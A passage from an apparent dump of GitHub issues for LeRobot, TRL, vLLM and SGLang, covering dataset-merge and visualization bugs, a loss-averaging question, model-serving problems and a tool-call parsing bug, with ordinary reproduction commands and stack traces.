script:\n`lerobot-edit-dataset \\\n --repo_id whosricky/so101-megamix-v1 \\\n --operation.type merge \\\n --operation.repo_ids \"['whosricky/so101_pick_red_cube_3cams', 'whosricky/so101_pick_blue_cube_3cams', 'whosricky/so101_pick_yellow_cube_3cams', 'whosricky/so101_pick_cube_reasoning_3cams', 'whosricky/so101_stacking_3cams', 'whosricky/so101_pickplace_red_cube_3cams', 'whosricky/so101_pickplace_all_red_cubes_3cams', 'whosricky/so101_sorting_cubes_3cams', 'whosricky/so101_pickplace_red_cubes_random_bowl_3cams']\" \\\n --push_to_hub true `\n\nTraining on the single datasets works flawlessly. Training on the merged dataset results in an error.\n\nThe problematic sample seems to be #51 of \"whosricky/so101_pick_blue_cube_3cams\" due to the timestamp exceeding the default tolerance_s. 
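\n\nA gap scan along these lines can surface such frames (sketch only; column names and the 1e-4 default tolerance_s are assumed from the LeRobotDataset v3 layout):\n\n```python\nimport numpy as np\nfrom lerobot.datasets.lerobot_dataset import LeRobotDataset\n\n# Scan each episode for frame-to-frame timestamp gaps that deviate from 1/fps\ndataset = LeRobotDataset(\"whosricky/so101-megamix-v1\")\nts = np.asarray(dataset.hf_dataset[\"timestamp\"]).squeeze()\nep = np.asarray(dataset.hf_dataset[\"episode_index\"]).squeeze()\ntolerance_s = 1e-4  # LeRobotDataset default\nfor e in np.unique(ep):\n    gaps = np.diff(ts[ep == e])\n    bad = np.flatnonzero(np.abs(gaps - 1.0 / dataset.fps) > tolerance_s)\n    if bad.size:\n        print(f\"episode {e}: first bad gap at local frame {bad[0]} ({gaps[bad[0]]:.6f}s)\")\n```\n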
\nHowever, the problem occurs only on the merged dataset and not on the single one.\n\n### Context & Reproduction\n\n```\nlerobot-train \\\n --dataset.repo_id=whosricky/so101-megamix-v1 \\\n --output_dir=outputs_xvla_megamix_v1/train/my_xvla \\\n --job_name=xvla_training_megamix_v1 \\\n --policy.path=lerobot/xvla-base \\\n --policy.repo_id=whosricky/xvla-so101-megamix-v1 \\\n --policy.private=true \\\n --policy.dtype=bfloat16 \\\n --num_workers=8 \\\n --batch_size=8 \\\n --steps=30000 \\\n --eval_freq=5000 \\\n --log_freq=100 \\\n --save_freq=5000 \\\n --policy.device=cuda \\\n --policy.freeze_vision_encoder=false \\\n --policy.freeze_language_encoder=false \\\n --policy.train_policy_transformer=true \\\n --policy.train_soft_prompts=true \\\n --policy.action_mode=auto \\\n --policy.num_image_views=3 \\\n --policy.empty_cameras=0 \\\n --rename_map='{\"observation.images.top\": \"observation.images.image\", \"observation.images.gripper\": \"observation.images.image2\", \"observation.images.front\": \"observation.images.empty_camera_0\"}' \\\n --wandb.enable=true\n```\n\n### Relevant logs or stack trace\n\n```Shell\nWARNING:accelerate.utils.other:Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.\nINFO 2025-12-18 12:38:22 ot_train.py:164 {'batch_size': 8,\n 'checkpoint_path': None,\n 'dataset': {'episodes': None,\n 'image_transforms': {'enable': False,\n 'max_num_transforms': 3,\n 'random_order': False,\n 'tfs': {'affine': {'kwargs': {'degrees': [-5.0,\n 5.0],\n 'translate': [0.05,\n 0.05]},\n 'type': 'RandomAffine',\n 'weight': 1.0},\n 'brightness': {'kwargs': {'brightness': [0.8,\n 1.2]},\n 'type': 'ColorJitter',\n 'weight': 1.0},\n 'contrast': {'kwargs': {'contrast': [0.8,\n 1.2]},\n 'type': 'ColorJitter',\n 'weight': 1.0},\n 'hue': {'kwargs': {'hue': [-0.05,\n 0.05]},\n 'type': 'ColorJitter',\n 'weight': 1.0},\n 'saturation': {'kwargs': {'satur", "url": "https://github.com/huggingface/lerobot/issues/2680", "state": "open", "labels": [ "bug", "question", "dataset", "visualization", "examples", "training" ], "created_at": "2025-12-18T13:29:50Z", "updated_at": "2025-12-26T06:26:37Z", "user": "RiccardoIzzo" }, { "repo": "huggingface/trl", "number": 4719, "title": "Loss calculation of `GKDTrainer` may be inaccurate when performing gradient accumulation?", "body": "It seems that `GKDTrainer` averages the loss of tokens in a micro batch ahead?\n\nhttps://github.com/huggingface/trl/blob/8918c9836a3e0b43a6851c08d01b69072f56ca52/trl/experimental/gkd/gkd_trainer.py#L284", "url": "https://github.com/huggingface/trl/issues/4719", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb GKD" ], "created_at": "2025-12-18T12:50:05Z", "updated_at": "2025-12-18T12:50:49Z", "comments": 0, "user": "jue-jue-zi" }, { "repo": "huggingface/lerobot", "number": 2679, "title": "Merging datasets removes fps from scalar features", "body": "### Ticket Type\n\n\ud83d\udc1b Bug Report (Something isn't working)\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.3\n- Platform: Linux-6.17.9-arch1-1-x86_64-with-glibc2.42\n- Python version: 3.12.11\n- Huggingface Hub version: 0.34.4\n- Datasets version: 4.1.1\n- Numpy version: 2.3.5\n- FFmpeg version: n8.0.1\n- PyTorch version: 2.7.1+cu128\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.8\n- GPU model: NVIDIA GeForce RTX 5090 Laptop GPU\n- Using GPU in script?: \n- lerobot scripts: 
['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nWhen using the `merge_datasets` function, the fps attribute is removed from the scalar features in the dataset. Below are the scalar features from dataset.meta.features of a dataset before and after merging\n\nBefore:\n```\n'timestamp': {'dtype': 'float32', 'shape': (1,), 'names': None, 'fps': 10}, \n'frame_index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}, \n'episode_index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}, \n'index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}, \n'task_index': {'dtype': 'int64', 'shape': (1,), 'names': None, 'fps': 10}}\n```\n\nAfter:\n```\n'timestamp': {'dtype': 'float32', 'shape': (1,), 'names': None}, \n'frame_index': {'dtype': 'int64', 'shape': (1,), 'names': None}, \n'episode_index': {'dtype': 'int64', 'shape': (1,), 'names': None}, \n'index': {'dtype': 'int64', 'shape': (1,), 'names': None}, \n'task_index': {'dtype': 'int64', 'shape': (1,), 'names': None}\n```\n\nThis creates subsequent problems when trying to add an additional dataset to a merged output as the feature mismatch will cause an error to be thrown \n\n### Context & Reproduction\n\nRunning the script below shows the features change before and after the merge\n\n```\nfrom lerobot.datasets.dataset_tools import split_dataset, merge_datasets\nfrom lerobot.datasets.lerobot_dataset import LeRobotDataset\nfrom pprint import pprint\n\ndataset = LeRobotDataset(\"lerobot/pusht\")\nfeat_1 = dataset.meta.features\nsplits = split_dataset(dataset, splits={\"train\": 0.8, \"val\": 0.2})\nmerged = merge_datasets([splits[\"train\"], splits[\"val\"]], output_repo_id=\"lerobot/pusht_merged\")\nfeat_2 = merged.meta.features\n\nprint(\"Features of original dataset:\")\npprint(feat_1)\nprint(\"Features of merged dataset:\")\npprint(feat_2)\n```\n\n### Relevant logs or stack trace\n\n```Shell\nFeatures of original dataset:\n{'action': {'dtype': 'float32',\n 'fps': 10.0,\n 'names': {'motors': ['motor_0', 'motor_1']},\n 'shape': (2,)},\n 'episode_index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'frame_index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.done': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.reward': {'dtype': 'float32', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.success': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'observation.image': {'dtype': 'video',\n 'names': ['height', 'width', 'channel'],\n 'shape': (96, 96, 3),\n 'video_info': {'has_audio': False,\n 'video.codec': 'av1',\n 'video.fps': 10.0,\n 'video.is_depth_map': False,\n 'video.pix_fmt': 'yuv420p'}},\n 'observation.state': {'dtype': 'float32',\n 'fps': 10.0,\n 'names': {'motors': ['motor_0', 'motor_1']},\n 'shape': (2,)},\n 'task_index': {'dtype': 'int64', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'timestamp': {'dtype': 'float32', 'fps': 10.0, 'names': None, 'shape': (1,)}}\nFeatures of merged dataset:\n{'action': {'dtype': 'float32',\n 'fps': 10.0,\n 'names': {'motors': ['motor_0', 'motor_1']},\n 'shape': (2,)},\n 'episode_index': {'dtype': 'int64', 'names': None, 'shape': (1,)},\n 
'frame_index': {'dtype': 'int64', 'names': None, 'shape': (1,)},\n 'index': {'dtype': 'int64', 'names': None, 'shape': (1,)},\n 'next.done': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.reward': {'dtype': 'float32', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'next.success': {'dtype': 'bool', 'fps': 10.0, 'names': None, 'shape': (1,)},\n 'observation.image': {'dtype': 'video',\n 'names': ['height', 'width', 'channel'],\n 'shape': (96, 96, 3),\n 'video_info': {'has_audio': False,\n 'video.codec': 'av1',\n 'video.fps': 10.0,\n ", "url": "https://github.com/huggingface/lerobot/issues/2679", "state": "open", "labels": [ "bug", "enhancement", "question", "dataset", "performance", "examples" ], "created_at": "2025-12-18T12:47:14Z", "updated_at": "2025-12-18T15:25:12Z", "user": "reeceomahoney" }, { "repo": "vllm-project/vllm", "number": 30956, "title": "[Feature]: Could vLLM output logs using a user-provided logger?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nHi,\nI have defined a logger in a Python script, e.g. logger_utils.py.\nCould I run the serve command from the shell with that logger, such as:\n`vllm serve qwen3-embedding-0.6b --logger_file logger_utils.py`\n\nThanks, I really need your help.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30956", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-18T09:35:22Z", "updated_at": "2025-12-19T01:52:41Z", "comments": 5, "user": "ucas010" }, { "repo": "huggingface/lerobot", "number": 2678, "title": "Bug: lerobot-dataset-viz IndexError when visualizing specific episodes", "body": "# Bug Report: `lerobot-dataset-viz` IndexError when visualizing specific episodes\n\n## Description\n\nThe `lerobot-dataset-viz` command fails with an `IndexError` when trying to visualize a specific episode using the `--episode-index` parameter. The issue is caused by `EpisodeSampler` using global dataset indices while the dataset has been filtered to contain only the specified episode.\n\n## Error Message\n\n```\nIndexError: Invalid key: 180 is out of bounds for size 180\n```\n\nFull traceback:\n```\nTraceback (most recent call last):\n File \"/path/to/lerobot/scripts/lerobot_dataset_viz.py\", line 289, in main\n visualize_dataset(dataset, **vars(args))\n File \"/path/to/lerobot/scripts/lerobot_dataset_viz.py\", line 148, in visualize_dataset\n for batch in tqdm.tqdm(dataloader, total=len(dataloader)):\n ...\n File \"/path/to/lerobot/datasets/lerobot_dataset.py\", line 1028, in __getitem__\n item = self.hf_dataset[idx]\n ...\nIndexError: Invalid key: 180 is out of bounds for size 180\n```\n\n## Steps to Reproduce\n\n1. Create a LeRobot dataset with multiple episodes (e.g., 20 episodes, 180 frames each)\n2. Try to visualize episode 1:\n ```bash\n lerobot-dataset-viz \\\n --repo-id lerobot/test \\\n --root ./lerobot_dataset \\\n --mode local \\\n --episode-index 1 \\\n --batch-size 2\n ```\n3. 
Error occurs when trying to load the data\n\n## Root Cause Analysis\n\nThe bug is in the `EpisodeSampler` class (line 81-91 of `lerobot_dataset_viz.py`):\n\n```python\nclass EpisodeSampler(torch.utils.data.Sampler):\n def __init__(self, dataset: LeRobotDataset, episode_index: int):\n from_idx = dataset.meta.episodes[\"dataset_from_index\"][episode_index] # 180\n to_idx = dataset.meta.episodes[\"dataset_to_index\"][episode_index] # 360\n self.frame_ids = range(from_idx, to_idx) # range(180, 360)\n```\n\n**The problem:**\n1. At line 287, the dataset is filtered: `dataset = LeRobotDataset(repo_id, episodes=[args.episode_index], ...)`\n2. The filtered dataset only contains 180 frames with **local indices 0-179**\n3. But `EpisodeSampler` uses indices from `dataset.meta.episodes` which are **global indices 180-359** (position in the full dataset)\n4. When DataLoader tries to access `dataset[180]`, it fails because the filtered dataset only has indices 0-179\n\n**Example:**\n```\nFull dataset (3600 frames):\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Episode 0\u2502 Episode 1\u2502 Episode 2\u2502 ... \u2502 Episode 19\u2502\n\u2502 0-179 \u2502 180-359 \u2502 360-539 \u2502 ... \u2502 3420-3599\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n \u2191\n Global indices\n\nFiltered dataset (180 frames, episode 1 only):\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Episode 1\u2502 \u2190 Only these 180 frames exist\n\u2502 0-179 \u2502 \u2190 Local indices in filtered dataset\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\nEpisodeSampler tries to use: range(180, 360) \u2717 Out of bounds!\n```\n\n## Proposed Fix\n\nModify `EpisodeSampler` to handle filtered datasets:\n\n```python\nclass EpisodeSampler(torch.utils.data.Sampler):\n def __init__(self, dataset: LeRobotDataset, episode_index: int):\n # Check if dataset is already filtered to a single episode\n if dataset.episodes is not None and len(dataset.episodes) == 1:\n # Dataset is filtered, use all available frames (local indices)\n self.frame_ids = range(len(dataset))\n else:\n # Dataset is not filtered, use global indices from metadata\n from_idx = dataset.meta.episodes[\"dataset_from_index\"][episode_index]\n to_idx = dataset.meta.episodes[\"dataset_to_index\"][episode_index]\n self.frame_ids = range(from_idx, to_idx)\n\n def __iter__(self) -> Iterator:\n return iter(self.frame_ids)\n\n def __len__(self) -> int:\n return len(self.frame_ids)\n```\n\n## Workaround\n\nUntil this is fixed, users can visualize a specific episode by:\n\n1. Loading the full dataset without filtering\n2. 
Using `torch.utils.data.Subset` to select the episode\n\n```python\nimport rerun as rr\nfrom lerobot.datasets.lerobot_dataset import LeRobotDataset\nfrom torch.utils.data import DataLoader, Subset\n\n# Load full dataset (no filtering)\ndataset = LeRobotDataset(\n repo_id=\"lerobot/test\",\n root=\"./lerobot_dataset\"\n)\n\n# Manually select episode frames\nepisode_index = 1\nfrom_idx = dataset.meta.episodes[episode_index][\"dataset_from_index\"]\nto_idx = dataset.meta.episodes[episode_index][\"dataset_to_index\"]\nepisode_dataset = Subset(dataset, range(from_idx, to_idx))\n\n# Create dataloader\ndataloader = DataLoader(episode_dataset, batch_size=2, shuffle=False)\n\n# Visualize...\n```\n\n## Environment\n\n- **LeRobot Version:** 0.4.2\n- **Python Version:** 3.12.11\n- **PyTorch Version:** 2.7.1+cu126\n- **Datasets Version:** 4.1.1\n- **OS:** Linux\n\n## Additional Context\n\nThis issue affects any dataset where users want to visualize a specific episode that is not episode 0. The bug makes the `--episode-index` parameter effectively unusable for episodes other than the first one when the dataset has already been filtered.\n\n## Impact\n\n- **Severity:** Medium (cor", "url": "https://github.com/huggingface/lerobot/issues/2678", "state": "open", "labels": [ "bug", "question", "dataset", "visualization", "python", "examples" ], "created_at": "2025-12-18T08:45:05Z", "updated_at": "2025-12-24T08:31:00Z", "user": "apeSh1t" }, { "repo": "vllm-project/vllm", "number": 30941, "title": "[Performance]: Why Does Latency Remain Unchanged in vLLM 0.11.0 When Input Token Count Decreases for qwen3-vl-30b-a3b?", "body": "### Proposal to improve performance\n\n_No response_\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\nUsing vLLM version 0.11.0 to run the qwen3-vl-30b-a3b model, the stress test results show that although the number of input tokens decreases, the latency does not change.\n\nThe model is deployed on a single A800 GPU. 
The startup command is:\nvllm serve\n--dtype bfloat16\n--max-model-len 128000\n--gpu-memory-utilization 0.95\n--limit-mm-per-prompt.video 0\n\nI performed a stress test using one image and a set of text prompts, with QPS set to 10.\nI resized the image to 0.25x and 0.7x of the original size while keeping everything else unchanged.\n\nThe conclusions are as follows:\nqwen3-30b-a3b (single image *0.25) latency 3s\nqwen3-30b-a3b (single image *0.7) latency 5s\nqwen3-30b-a3b (single image) latency 5s\n\nPrior conditions:\nInput token scale / Output token scale\nSingle image + text prompts: about 4200 / about 70\nSingle image *0.6 + text prompts: about 1900 / about 70\nSingle image *0.3 + text prompts: about 860 / about 70\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30941", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-18T07:40:35Z", "updated_at": "2025-12-18T07:40:35Z", "comments": 0, "user": "Hormoney" }, { "repo": "vllm-project/vllm", "number": 30933, "title": "[Usage]: What is the latest instruction to run DeepSeek V3.2?", "body": "### Your current environment\n\nvLLM 0.12.0\n\n### How would you like to use vllm\n\nI am following the guidelines here https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html for running DeepSeek v3.2. By following the instructions I installed vLLM 0.12.0 on my H200 node. However, when I try to run it with `vllm serve deepseek-ai/DeepSeek-V3.2 --tensor-parallel-size 8 --tokenizer-mode deepseek_v32` it gives an error \n\n```\n(APIServer pid=816209) ValueError: No tokenizer registered for tokenizer_mode='deepseek_v32'. \n```\n\nIf I do not include the `--tokenizer-mode` then the server spins up with no errors, but when I try to send a request, I get another error below\n\n```\n(APIServer pid=753941) ERROR 12-18 06:04:47 [serving_chat.py:263] ValueError: As of transformers v4.44, default chat template is no longer allowed, so you must provide a chat template if the tokenizer does not define one. \n```\n\nI am wondering if there is an update on the instructions to run DeepSeek V3.2 on vLLM.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30933", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-18T06:18:29Z", "updated_at": "2025-12-18T15:50:29Z", "comments": 1, "user": "IKACE" }, { "repo": "vllm-project/vllm", "number": 30923, "title": "[Bug]: Using the official document's vLLM online method to deploy DeepSeek-OCR, the result is very bad, but using the offline method the result is normal. Why?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI used https://github.com/vllm-project/recipes/blob/main/DeepSeek/DeepSeek-OCR.md\nBoth the offline and the online methods work and run OK,\nbut for the same picture the offline result is better than the online one. I can't find the reason for what happened. Can someone help me?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30923", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-18T04:14:33Z", "updated_at": "2025-12-18T04:25:20Z", "comments": 0, "user": "git-liweichao" }, { "repo": "vllm-project/vllm", "number": 30922, "title": "[Bug]: Using the official document's vLLM online method to deploy DeepSeek-OCR, the result is very bad, but using the offline method the result is normal. Why?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nI used https://github.com/vllm-project/recipes/blob/main/DeepSeek/DeepSeek-OCR.md\nBoth the offline and the online methods work and run OK,\nbut for the same picture the offline result is better than the online one. I can't find the reason for what happened. Can someone help me?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30922", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-18T04:08:46Z", "updated_at": "2025-12-18T04:25:36Z", "comments": 1, "user": "git-liweichao" }, { "repo": "sgl-project/sglang", "number": 15359, "title": "[Bug] The handling logic for tool_choice = 'auto' in the DeepseekV3.2 model may be incorrect.", "body": "### Checklist\n\n- [ ] I searched related issues but found no solution.\n- [ ] The bug persists in the latest version.\n- [ ] Issues without environment info and a minimal reproducible demo are hard to resolve and may receive no feedback.\n- [ ] If this is not a bug report but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. Otherwise, it will be closed.\n\n### Describe the bug\n\nWhen using SGLang (sglang:v0.5.6.post2) with DeepseekV3.2, I noticed that the responses to some requests that involve tool calls are not correct,\nlike the following request:\n```sh\ncurl -X POST http://{host}:{port}/v1/chat/completions \\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer sk-1234\" \\\n -d '{\n \"model\": \"DeepseekV3.2\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather in Beijing?\"\n }\n ],\n \"tools\": [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"strict\": true,\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": {\n \"type\": \"string\",\n \"description\": \"The city and state, e.g. 
San Francisco, CA\"\n },\n \"unit\": {\n \"type\": \"string\",\n \"enum\": [\"celsius\", \"fahrenheit\"]\n }\n },\n \"required\": [\"location\"]\n }\n }\n }\n ],\n \"tool_choice\": \"auto\",\n \"stream\": false\n }'\n``` \nmight response something like \n```sh\n{\"id\":\"88c2a168ad43446f9116aeed715cd835\",\"object\":\"chat.completion\",\"created\":1766024807,\"model\":\"DeepseekV3.2\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"tool_call_name=current_weather\",\"reasoning_content\":null,\"tool_calls\":null},\"logprobs\":null,\"finish_reason\":\"stop\",\"matched_stop\":1}],\"usage\":{\"prompt_tokens\":198,\"total_tokens\":206,\"completion_tokens\":8,\"prompt_tokens_details\":null,\"reasoning_tokens\":0},\"metadata\":{\"weight_version\":\"default\"}}\n```\nor\n```sh\n{\"id\":\"0223b02af05b4c9b99e8b9e4b2abab12\",\"object\":\"chat.completion\",\"created\":1766026261,\"model\":\"DeepseekV3.2\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":\"tool_call_name: get_current_weather\\ntool_call_arguments: {\\n \\\"location\\\": \\\"Beijing, China\\\",\\n \\\"unit\\\": \\\"celsius\\\"\\n}\",\"reasoning_content\":null,\"tool_calls\":null},\"logprobs\":null,\"finish_reason\":\"stop\",\"matched_stop\":1}],\"usage\":{\"prompt_tokens\":198,\"total_tokens\":232,\"completion_tokens\":34,\"prompt_tokens_details\":null,\"reasoning_tokens\":0},\"metadata\":{\"weight_version\":\"default\"}}\n```\nAs you can see from the response, the content value contains `tool_call_name` but tool_calls is set to `null`\n\nAnd if change tool_choice to 'required', the response looks like \n```sh\n{\"id\":\"550109a7f6854af3ba47fdad4f38f9d5\",\"object\":\"chat.completion\",\"created\":1766025639,\"model\":\"DeepseekV3.2\",\"choices\":[{\"index\":0,\"message\":{\"role\":\"assistant\",\"content\":null,\"reasoning_content\":null,\"tool_calls\":[{\"id\":\"call_f171fbf82d7d41dab0eaf258\",\"index\":0,\"type\":\"function\",\"function\":{\"name\":\"get_current_weather\",\"arguments\":\"{\\\"location\\\": \\\"Beijing, China\\\", \\\"unit\\\": \\\"celsius\\\"}\"}}]},\"logprobs\":null,\"finish_reason\":\"tool_calls\",\"matched_stop\":null}],\"usage\":{\"prompt_tokens\":198,\"total_tokens\":229,\"completion_tokens\":31,\"prompt_tokens_details\":null,\"reasoning_tokens\":0},\"metadata\":{\"weight_version\":\"default\"}}\n```\n\nand when checking the source codes, I find it might be related to the following codes\nhttps://github.com/sgl-project/sglang/blob/9e7656be80578fe981a723bd115373371a9d0d90/python/sglang/srt/entrypoints/openai/serving_chat.py#L248-L260\n\nhttps://github.com/sgl-project/sglang/blob/9e7656be80578fe981a723bd115373371a9d0d90/python/sglang/srt/function_call/function_call_parser.py#L189-L201\n\n\n### Reproduction\n\nstart SGLang with the following command\n```sh\npython3 -m sglang.launch_server --model /root/.cache/huggingface/DeepSeek-V3.2 --served-model-name VILLM-N2 --tp 8 --ep 8 --dp 8 --enable-dp-attention --trust-remote-code --port 30000 --host 0.0.0.0 --enable-metrics --mem-fraction-static 0.75 --cuda-graph-max-bs 128 --torch-compile-max-bs 8 --speculative-algorithm EAGLE --speculative-num-steps 3 --speculative-eagle-topk 1 --speculative-num-draft-tokens 4 --nsa-prefill-backend flashmla_sparse --nsa-decode-backend fa3 --grammar-backend xgrammar --reasoning-parser deepseek-v3 --tool-call-parser deepseekv32 --chat-template ./examples/chat_template/tool_chat_template_deepseekv32.jinja\n```\n\nsend request\n```sh\ncurl -X POST http://{host}:{port}/v1/chat/completions 
\\\n -H \"Content-Type: application/json\" \\\n -H \"Authorization: Bearer sk-1234\" \\\n -d '{\n \"model\": \"DeepseekV3.2\",\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"What is the weather in Beijing?\"\n }\n ],\n \"tools\": [\n ", "url": "https://github.com/sgl-project/sglang/issues/15359", "state": "closed", "labels": [], "created_at": "2025-12-18T02:47:26Z", "updated_at": "2025-12-18T03:36:38Z", "comments": 4, "user": "JerryKwan" }, { "repo": "huggingface/lerobot", "number": 2673, "title": "Dataset v2 not working anymore", "body": "### Ticket Type\n\nFeature\n\n### Environment & System Info\n\n```Shell\n- LeRobot version: 0.4.3\n- Platform: macOS-26.2-arm64-arm-64bit\n- Python version: 3.10.19\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- FFmpeg version: 7.1.1\n- PyTorch version: 2.7.1\n- Is PyTorch built with CUDA support?: False\n- Cuda version: N/A\n- GPU model: N/A\n- Using GPU in script?: \n- lerobot scripts: ['lerobot-calibrate', 'lerobot-dataset-viz', 'lerobot-edit-dataset', 'lerobot-eval', 'lerobot-find-cameras', 'lerobot-find-joint-limits', 'lerobot-find-port', 'lerobot-imgtransform-viz', 'lerobot-info', 'lerobot-record', 'lerobot-replay', 'lerobot-setup-motors', 'lerobot-teleoperate', 'lerobot-train']\n```\n\n### Description\n\nI did git pull and my dataset v2 doesn't work anymore. My model raises with the logs below.\n\n### Context & Reproduction\n\n1. `lerobot-train --help`\n2. Check outputs\n\n### Relevant logs or stack trace\n\n```Shell\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 733, in __next__\n data = self._next_data()\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1488, in _next_data\n return self._process_data(data, worker_id)\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/dataloader.py\", line 1550, in _process_data\n data.reraise()\nFile \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/_utils.py\", line 750, in reraise\n raise exception\nIndexError: Caught IndexError in DataLoader worker process 1.\nOriginal Traceback (most recent call last):\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/_utils/worker.py\", line 349, in _worker_loop\n data = fetcher.fetch(index) # type: ignore[possibly-undefined]\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in fetch\n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/torch/utils/data/_utils/fetch.py\", line 52, in \n data = [self.dataset[idx] for idx in possibly_batched_index]\n File \"/admin/home/michel_aratingi/code/collab-lerobot/src/lerobot/datasets/lerobot_dataset.py\", line 975, in __getitem__\n item = self.hf_dataset[idx]\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2859, in __getitem__\n return self._getitem(key)\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/arrow_dataset.py\", line 2840, in _getitem\n pa_subtable = query_table(self._data, key, indices=self._indices)\n File 
